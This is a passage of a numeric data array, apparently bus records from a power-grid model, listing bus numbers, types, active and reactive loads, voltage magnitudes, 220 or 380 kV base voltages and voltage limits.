2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1445, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1446, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1447, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1448, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1449, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1450, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1451, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1452, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1453, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1454, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1455, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1456, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1457, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1458, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1461, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1462, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1463, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1464, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1465, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1466, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1467, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1468, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1469, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1470, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1471, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1472, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1473, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1474, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1475, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1476, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1477, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1480, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1482, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1483, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1484, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1485, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1486, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1489, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1490, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1491, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1492, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1493, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1494, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1495, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1497, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1498, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1500, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1501, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1503, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1504, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1510, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1511, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1512, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1513, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1517, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1518, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1519, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1, 1, 310.298834, 62.059767, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [2, 1, 0, 0, 0, 0, 0, 1.000012, 0, 380.0, 0, 1.1, 0.9 ], [3, 1, 54.387039, 10.877408, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [4, 1, 89.44129, 17.888258, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [5, 1, 0, 0, 0, 0, 0, 1.000161, 0, 380.0, 0, 1.1, 0.9 ], [6, 1, 262.636702, 52.52734, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [7, 1, 197.929415, 39.585883, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [8, 1, 165.613193, 33.122639, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [9, 1, 112.001614, 22.400323, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [10, 1, 0, 0, 0, 0, 0, 1.001249, 0, 380.0, 0, 1.1, 0.9 ], [11, 1, 98.132506, 19.626501, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [12, 1, 0, 0, 0, 0, 0, 1.000265, 0, 380.0, 0, 1.1, 0.9 ], [13, 1, 0, 0, 0, 0, 0, 1.000221, 0, 380.0, 0, 1.1, 0.9 ], [14, 1, 234.696956, 46.939391, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [15, 1, 0, 0, 0, 0, 0, 1.000414, 0, 380.0, 0, 1.1, 0.9 ], [16, 1, 400.267096, 80.053419, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [17, 1, 94.273416, 18.854683, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [18, 1, 0, 0, 0, 0, 0, 1.002955, 0, 380.0, 0, 1.1, 0.9 ], [19, 1, 232.914073, 46.582815, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [20, 1, 0, 0, 0, 0, 0, 0.997836, 0, 380.0, 0, 1.1, 0.9 ], [21, 1, 1001.56624, 200.313248, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [22, 1, 0, 0, 0, 0, 0, 1.000224, 0, 380.0, 0, 1.1, 0.9 ], [23, 1, 131.13898, 26.227796, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [24, 1, 0, 0, 0, 0, 0, 0.999994, 0, 380.0, 0, 1.1, 0.9 ], [25, 1, 62.724688, 12.544938, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [26, 1, 0, 0, 0, 0, 0, 1.000521, 0, 380.0, 0, 1.1, 0.9 ], [27, 1, 76.996291, 15.399258, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [28, 1, 227.500973, 45.500195, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [29, 1, 83.565844, 16.713169, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [30, 1, 0, 0, 0, 0, 0, 0.999619, 0, 380.0, 0, 1.1, 0.9 ], [31, 1, 164.455423, 32.891085, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [32, 1, 0, 0, 0, 0, 0, 0.999574, 0, 380.0, 0, 1.1, 0.9 ], [33, 1, 206.196196, 41.239239, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [34, 1, 40.908358, 8.181672, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [35, 1, 2.70835, 0.54167, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [36, 1, 8.966956, 1.793391, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [37, 1, 0, 0, 0, 0, 0, 1.003481, 0, 380.0, 0, 1.1, 0.9 ], [38, 1, 216.033985, 43.206797, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [39, 1, 70.74, 14.148, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [40, 1, 73.890142, 14.778028, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [41, 1, 79.415156, 15.883031, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [42, 1, 0, 0, 0, 0, 0, 1.001319, 0, 380.0, 0, 1.1, 0.9 ], [43, 1, 121.786721, 24.357344, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [44, 1, 155.808052, 31.16161, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [45, 1, 82.706399, 16.54128, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [46, 1, 0, 0, 0, 0, 0, 0.999981, 0, 380.0, 0, 1.1, 0.9 ], [47, 1, 359.61406, 71.922812, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [48, 1, 247.186777, 49.437355, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [49, 1, 62.525784, 12.505157, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [50, 1, 91.045981, 18.209196, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [51, 1, 117.989648, 23.59793, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [52, 1, 0, 0, 0, 0, 0, 1.00014, 0, 380.0, 0, 1.1, 0.9 ], [53, 1, 179.030394, 35.806079, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [54, 1, 90.957863, 18.191573, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [55, 1, 89.203083, 17.840617, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [56, 1, 0, 0, 0, 0, 0, 0.999644, 0, 380.0, 0, 1.1, 0.9 ], [57, 1, 106.480616, 21.296123, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [58, 1, 243.910046, 48.782009, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [59, 1, 69.6622, 13.93244, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [60, 1, 36.727845, 7.345569, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [61, 1, 0, 0, 0, 0, 0, 0.999575, 0, 380.0, 0, 1.1, 0.9 ], [62, 1, 280.004982, 56.000996, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [63, 1, 165.284543, 33.056909, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [64, 1, 1754.003961, 350.800792, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [65, 1, 5.844371, 1.168874, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [66, 1, 185.435215, 37.087043, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [67, 1, 397.789774, 79.557955, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [68, 1, 0, 0, 0, 0, 0, 0.998376, 0, 380.0, 0, 1.1, 0.9 ], [69, 1, 0, 0, 0, 0, 0, 0.999886, 0, 380.0, 0, 1.1, 0.9 ], [70, 1, 752.527522, 150.505504, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [71, 1, 174.877703, 34.975541, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [72, 1, 286.42568, 57.285136, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [73, 1, 91.695653, 18.339131, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [74, 1, 0, 0, 0, 0, 0, 1.001577, 0, 380.0, 0, 1.1, 0.9 ], [75, 1, 114.285057, 22.857011, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [76, 1, 110.310155, 22.062031, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [77, 1, 106.842924, 21.368585, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [78, 1, 0, 0, 0, 0, 0, 0.999181, 0, 380.0, 0, 1.1, 0.9 ], [79, 1, 110.323553, 22.064711, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [80, 1, 117.180636, 23.436127, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [81, 1, 132.280979, 26.456196, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [82, 1, 4.402389, 0.880478, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [83, 1, 294.552265, 58.910453, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [84, 1, 28.996853, 5.799371, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [85, 1, 100.555457, 20.111091, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [86, 1, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [87, 1, 0, 0, 0, 0, 0, 1.000253, 0, 380.0, 0, 1.1, 0.9 ], [88, 1, 81.161581, 16.232316, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [89, 1, 100.693364, 20.138673, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [90, 1, 116.296389, 23.259278, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [91, 1, 40.395575, 8.079115, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [92, 1, 44.085744, 8.817149, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [93, 1, 43.239283, 8.647857, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [94, 1, 0, 0, 0, 0, 0, 1.001076, 0, 380.0, 0, 1.1, 0.9 ], [95, 1, 0, 0, 0, 0, 0, 1.000656, 0, 380.0, 0, 1.1, 0.9 ], [96, 1, 0, 0, 0, 0, 0, 0.999999, 0, 380.0, 0, 1.1, 0.9 ], [97, 1, 6.081282, 1.216256, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [98, 1, 111.810319, 22.362064, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [99, 1, 0, 0, 0, 0, 0, 1.000643, 0, 380.0, 0, 1.1, 0.9 ], [100, 1, 0, 0, 0, 0, 0, 1.001999, 0, 380.0, 0, 1.1, 0.9 ], [101, 1, 79.173108, 15.834622, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [102, 1, 153.243241, 30.648648, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [103, 1, 179.171001, 35.8342, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [104, 1, 0, 0, 0, 0, 0, 1.000068, 0, 380.0, 0, 1.1, 0.9 ], [105, 1, 0, 0, 0, 0, 0, 1.00014, 0, 380.0, 0, 1.1, 0.9 ], [106, 1, 0, 0, 0, 0, 0, 0.999962, 0, 380.0, 0, 1.1, 0.9 ], [107, 1, 0, 0, 0, 0, 0, 1.000005, 0, 380.0, 0, 1.1, 0.9 ], [108, 1, 126.383297, 25.276659, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [109, 1, 51.17044, 10.234088, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [110, 1, 66.421283, 13.284257, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [111, 1, 117.052248, 23.41045, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [112, 1, 59.243192, 11.848638, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [113, 1, 93.388733, 18.677747, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [114, 1, 137.538766, 27.507753, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [115, 1, 88.663157, 17.732631, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [116, 1, 148.3656, 29.67312, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [117, 1, 0, 0, 0, 0, 0, 1.000248, 0, 380.0, 0, 1.1, 0.9 ], [118, 1, 229.722902, 45.94458, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [119, 1, 44.529732, 8.905946, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [120, 1, 0, 0, 0, 0, 0, 1.000904, 0, 380.0, 0, 1.1, 0.9 ], [121, 1, 60.471396, 12.094279, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [122, 1, 52.942093, 10.588419, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [123, 1, 0, 0, 0, 0, 0, 1.000084, 0, 380.0, 0, 1.1, 0.9 ], [124, 1, 0, 0, 0, 0, 0, 1.000004, 0, 380.0, 0, 1.1, 0.9 ], [125, 1, 0, 0, 0, 0, 0, 0.999514, 0, 380.0, 0, 1.1, 0.9 ], [126, 1, 277.576708, 55.515342, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [127, 1, 214.595997, 42.919199, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [128, 1, 0, 0, 0, 0, 0, 1.000887, 0, 380.0, 0, 1.1, 0.9 ], [129, 1, 0, 0, 0, 0, 0, 0.999994, 0, 380.0, 0, 1.1, 0.9 ], [130, 1, 295.888843, 59.177769, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [131, 1, 65.332, 13.0664, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [132, 1, 170.114652, 34.02293, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [133, 1, 56.981744, 11.396349, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [134, 1, 56.748405, 11.349681, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [135, 1, 56.823643, 11.364729, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [136, 1, 55.04674, 11.009348, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [137, 1, 44.032325, 8.806465, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [138, 1, 0, 0, 0, 0, 0, 1.000213, 0, 380.0, 0, 1.1, 0.9 ], [139, 1, 86.254863, 17.250973, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [140, 1, 59.648931, 11.929786, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [141, 1, 70.673454, 14.134691, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [142, 1, 77.766029, 15.553206, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [143, 1, 0, 0, 0, 0, 0, 0.999985, 0, 380.0, 0, 1.1, 0.9 ], [144, 1, 70.836812, 14.167362, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [145, 1, 206.06616, 41.213232, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [146, 1, 265.658045, 53.131609, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [147, 1, 162.832738, 32.566548, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [148, 1, 229.786886, 45.957377, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [149, 1, 148.141943, 29.628389, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [150, 1, 193.414688, 38.682938, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [151, 1, 45.577876, 9.115575, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [152, 1, 94.614944, 18.922989, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [153, 1, 168.808447, 33.761689, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [154, 1, 173.399774, 34.679955, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [155, 1, 180.61119, 36.122238, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [156, 1, 0, 0, 0, 0, 0, 0.999987, 0, 380.0, 0, 1.1, 0.9 ], [157, 1, 0, 0, 0, 0, 0, 1.001028, 0, 380.0, 0, 1.1, 0.9 ], [158, 1, 47.585034, 9.517007, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [159, 1, 0, 0, 0, 0, 0, 1.001257, 0, 380.0, 0, 1.1, 0.9 ], [160, 1, 0, 0, 0, 0, 0, 1.000006, 0, 380.0, 0, 1.1, 0.9 ], [161, 1, 147.72428, 29.544856, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [162, 1, 220.804019, 44.160804, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [163, 1, 44.158718, 8.831744, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [164, 1, 44.336307, 8.867261, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [165, 1, 0, 0, 0, 0, 0, 1.000009, 0, 380.0, 0, 1.1, 0.9 ], [166, 1, 51.836316, 10.367263, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [167, 1, 72.920648, 14.58413, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [168, 1, 49.767412, 9.953482, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [169, 1, 170.3682, 34.07364, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [170, 1, 128.017336, 25.603467, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [171, 1, 109.262748, 21.85255, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [172, 1, 53.62318, 10.724636, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [173, 1, 51.226008, 10.245202, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [174, 1, 76.871884, 15.374377, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [175, 1, 51.192435, 10.238487, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [176, 1, 178.386627, 35.677325, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [177, 1, 29.088539, 5.817708, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [178, 1, 154.060036, 30.812007, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [179, 1, 56.765806, 11.353161, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [180, 1, 49.898596, 9.979719, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [181, 1, 37.662023, 7.532405, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [182, 1, 1.706107, 0.341221, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [183, 1, 510.691565, 102.138313, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [184, 1, 0, 0, 0, 0, 0, 0.999361, 0, 380.0, 0, 1.1, 0.9 ], [185, 1, 109.208438, 21.841688, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [186, 1, 58.808176, 11.761635, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [187, 1, 34.396795, 6.879359, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [188, 1, 51.192435, 10.238487, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [189, 1, 187.844148, 37.56883, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [190, 1, 248.459031, 49.691806, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [191, 1, 0, 0, 0, 0, 0, 1.000009, 0, 380.0, 0, 1.1, 0.9 ], [192, 1, 59.836461, 11.967292, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [193, 1, 51.109857, 10.221971, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [194, 1, 35.281953, 7.056391, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [195, 1, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [196, 1, 49.498523, 9.899705, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [197, 1, 78.42384, 15.684768, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [198, 1, 46.407029, 9.281406, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [199, 1, 59.747505, 11.949501, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [200, 1, 51.193622, 10.238724, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [201, 1, 0, 0, 0, 0, 0, 0.99965, 0, 380.0, 0, 1.1, 0.9 ], [202, 1, 52.458931, 10.491786, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [203, 1, 6.911935, 1.382387, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [204, 1, 202.587417, 40.517483, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [205, 1, 101.302828, 20.260566, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [206, 1, 48.618278, 9.723656, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [207, 1, 144.569819, 28.913964, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [208, 1, 42.57011, 8.514022, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [209, 1, 59.157578, 11.831516, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [210, 1, 67.960985, 13.592197, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [211, 1, 238.830133, 47.766027, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [212, 1, 59.859404, 11.971881, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [213, 1, 280.607505, 56.121501, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [214, 1, 188.813282, 37.762656, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [215, 1, 399.255108, 79.851022, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [216, 1, 134.623525, 26.924705, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [217, 1, 43.138158, 8.627632, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [218, 1, 131.421902, 26.28438, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [219, 1, 211.211013, 42.242203, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [220, 1, 0, 0, 0, 0, 0, 0.999486, 0, 380.0, 0, 1.1, 0.9 ], [221, 1, 120.48598, 24.097196, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [222, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [223, 1, 119.409064, 23.881813, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [224, 1, 138.856292, 27.771258, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [225, 1, 249.324437, 49.864887, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 